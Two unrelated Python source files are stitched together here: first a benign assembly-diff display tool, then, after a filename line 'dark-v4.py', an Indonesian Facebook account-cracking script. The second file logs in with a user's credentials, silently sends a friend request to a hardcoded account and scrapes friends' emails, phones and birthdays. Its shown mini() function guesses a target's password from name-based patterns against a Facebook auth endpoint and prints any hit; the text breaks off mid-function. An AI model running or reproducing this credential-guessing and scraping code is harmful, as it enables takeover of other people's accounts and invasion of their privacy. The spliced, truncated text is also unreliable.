if line is None:
return None
if line.line_num is None:
return out
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(str(line.line_num)))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(str(line.branch_target)))
formatted_line_num = Text(hex(line.line_num)[2:] + ":", line_color)
return formatted_line_num + " " + in_arrow + " " + out + out_arrow
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
if config.show_source and line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(r".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except Exception:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except Exception:
pass
padding = " " * 7 if config.show_line_numbers else " " * 2
output.append(
OutputLine(
base=None,
fmt2=padding + Text(source_line, line_format),
key2=source_line,
boring=True,
is_data_ref=False,
line1=None,
line2=None,
)
)
key2 = line2.normalized_original if line2 else None
boring = False
if line_prefix == " ":
boring = True
elif config.compress and config.compress.same_instr and line_prefix in "irs":
boring = True
if config.show_line_numbers:
if line2 and line2.source_line_num is not None:
num_color = (
BasicFormat.SOURCE_LINE_NUM
if sym_color == BasicFormat.NONE
else sym_color
)
num2 = Text(f"{line2.source_line_num:5}", num_color)
else:
num2 = Text(" " * 5)
else:
num2 = Text()
fmt2 = Text(line_prefix, sym_color) + num2 + " " + (part2 or Text())
output.append(
OutputLine(
base=part1,
fmt2=fmt2,
key2=key2,
boring=boring,
is_data_ref=is_data_ref,
line1=line1,
line2=line2,
)
)
output = output[config.skip_lines :]
return Diff(lines=output, score=score, max_score=max_score)
def chunk_diff_lines(
diff: List[OutputLine],
) -> List[Union[List[OutputLine], OutputLine]]:
"""Chunk a diff into an alternating list like A B A B ... A, where:
* A is a List[OutputLine] of insertions,
* B is a single non-insertion OutputLine, with .base != None."""
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
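# e.g. (with "i" denoting insertions and "bN" non-insertions) the diff
# [i, b1, b2, i, i, b3] chunks into [[i], b1, [], b2, [i, i], b3, []].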
def compress_matching(
li: List[Tuple[OutputLine, ...]], context: int
) -> List[Tuple[OutputLine, ...]]:
ret: List[Tuple[OutputLine, ...]] = []
matching_streak: List[Tuple[OutputLine, ...]] = []
context = max(context, 0)
def flush_matching() -> None:
if len(matching_streak) <= 2 * context + 1:
ret.extend(matching_streak)
else:
ret.extend(matching_streak[:context])
skipped = len(matching_streak) - 2 * context
filler = OutputLine(
base=Text(f"<{skipped} lines>", BasicFormat.SOURCE_OTHER),
fmt2=Text(),
key2=None,
boring=False,
is_data_ref=False,
line1=None,
line2=None,
)
columns = len(matching_streak[0])
ret.append(tuple([filler] * columns))
if context > 0:
ret.extend(matching_streak[-context:])
matching_streak.clear()
for line in li:
if line[0].boring:
matching_streak.append(line)
else:
flush_matching()
ret.append(line)
flush_matching()
return ret
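# e.g. with context=3, a streak of 10 boring (matching) rows collapses to the
# first 3 rows, a "<4 lines>" filler row, and the last 3 rows.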
def align_diffs(
old_diff: Diff, new_diff: Diff, config: Config
) -> Tuple[TableMetadata, List[Tuple[OutputLine, ...]]]:
meta: TableMetadata
diff_lines: List[Tuple[OutputLine, ...]]
padding = " " * 7 if config.show_line_numbers else " " * 2
if config.threeway:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
Text(f"{padding}PREVIOUS ({old_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=old_diff.score,
)
old_chunks = chunk_diff_lines(old_diff.lines)
new_chunks = chunk_diff_lines(new_diff.lines)
diff_lines = []
empty = OutputLine(Text(), Text(), None, True, False, None, None)
assert len(old_chunks) == len(new_chunks), "same target"
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(
a=old_chunk, b=new_chunk, autojunk=False
)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
diff_lines.append((empty, new_chunk[j], old_chunk[i]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
diff_lines.append((empty, new_chunk[j], empty))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
diff_lines.append((empty, empty, old_chunk[i]))
else:
assert isinstance(new_chunk, OutputLine)
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
diff_lines.append((new_chunk, new_chunk, old_chunk))
diff_lines = [
(base, new, old if old != new else empty) for base, new, old in diff_lines
]
else:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=None,
)
diff_lines = [(line, line) for line in new_diff.lines]
if config.compress:
diff_lines = compress_matching(diff_lines, config.compress.context)
return meta, diff_lines
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events
import watchdog.observers
class WatchEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
class Display:
basedump: str
mydump: str
last_refresh_key: object
config: Config
emsg: Optional[str]
last_diff_output: Optional[Diff]
pending_update: Optional[str]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.base_lines = process(basedump, config)
self.mydump = mydump
self.emsg = None
self.last_refresh_key = None
self.last_diff_output = None
def run_diff(self) -> Tuple[str, object]:
if self.emsg is not None:
return (self.emsg, self.emsg)
my_lines = process(self.mydump, self.config)
diff_output = do_diff(self.base_lines, my_lines, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
meta, diff_lines = align_diffs(last_diff_output, diff_output, self.config)
output = self.config.formatter.table(meta, diff_lines)
refresh_key = (
[line.key2 for line in diff_output.lines],
diff_output.score,
)
return (output, refresh_key)
def run_less(
self, output: str
) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
output, _ = self.run_diff()
proca, procb = self.run_less(output)
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
output, refresh_key = self.run_diff()
self.last_refresh_key = refresh_key
dthread = threading.Thread(target=self.display_thread, args=(output,))
dthread.start()
self.ready_queue.get()
def display_thread(self, initial_output: str) -> None:
proca, procb = self.run_less(initial_output)
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
output = self.pending_update
self.pending_update = None
proca, procb = self.run_less(output)
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
if not error:
self.mydump = text
self.emsg = None
else:
self.emsg = text
output, refresh_key = self.run_diff()
if refresh_key == self.last_refresh_key:
self.progress("Unchanged. ")
return
self.last_refresh_key = refresh_key
self.pending_update = output
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
try:
config = create_config(args, project)
except ValueError as e:
fail(str(e))
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.show_source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format in ("html", "json"):
print(display.run_diff()[0])
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
dark-v4.py
|
# -*- coding: utf-8 -*-
import os, sys
print '\x1b[1;33mSudah punya ID dan Password nya?'
print '\x1b[1;32mSilahkan Login '
import os, sys
def wa():
os.system('xdg-open https://api.whatsapp.com/send?phone=6289698096572&text=Assalamualaikum')
def restart():
ngulang = sys.executable
os.execl(ngulang, ngulang, *sys.argv)
user = raw_input('ID: ')
import getpass
sandi = raw_input('Password: ')
if sandi == '211743' and user == 'USER':
print 'Anda Telah Login'
sys.exit
else:
print 'Login GAGAL, Silahkan hubungi ADMIN'
wa()
restart()
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[31;1m█████████\n \x1b[31;1m█▄█████▄█ \x1b[0;36m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[31;1m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;33m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[31;1m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;33m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;33m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[37;1mVIP.V4\n \x1b[1;97m█████████ \x1b[0;36m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAdmin \x1b[1;91m : \x1b[1;96m ABDULLAH NURYADIN \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/SUMBEREJO123\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m089698096572\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mSUBSCRIBE CHANNEL CALON PRO GAMING \x1b[1;91m[\xe2\x98\x86]' '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mTerimakasih Udah Support Channel Ini \x1b[1;91m[\xe2\x98\x86]' '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mGunakan Tool Ini Dengan Sebaik Mungkin\x1b[1;91m[\xe2\x98\x86]'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(4)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 54 * '\x1b[1;97m\xe2\x95\x90'
print '\n \x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\n \x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\n \x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCEvS21vFrzxtqykmqse_9Qw ')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║--> \x1b[1;37;40m1. User Informasi'
print '║--> \x1b[1;37;40m2. Hack Akun Facebook '
print '║--> \x1b[1;37;40m3. Bot'
print '║--> \x1b[1;37;40m4. Others'
print '║--> \x1b[1;37;40m5. Logout'
print '║--> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini HACK Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook File Id'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce Wordlist(\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
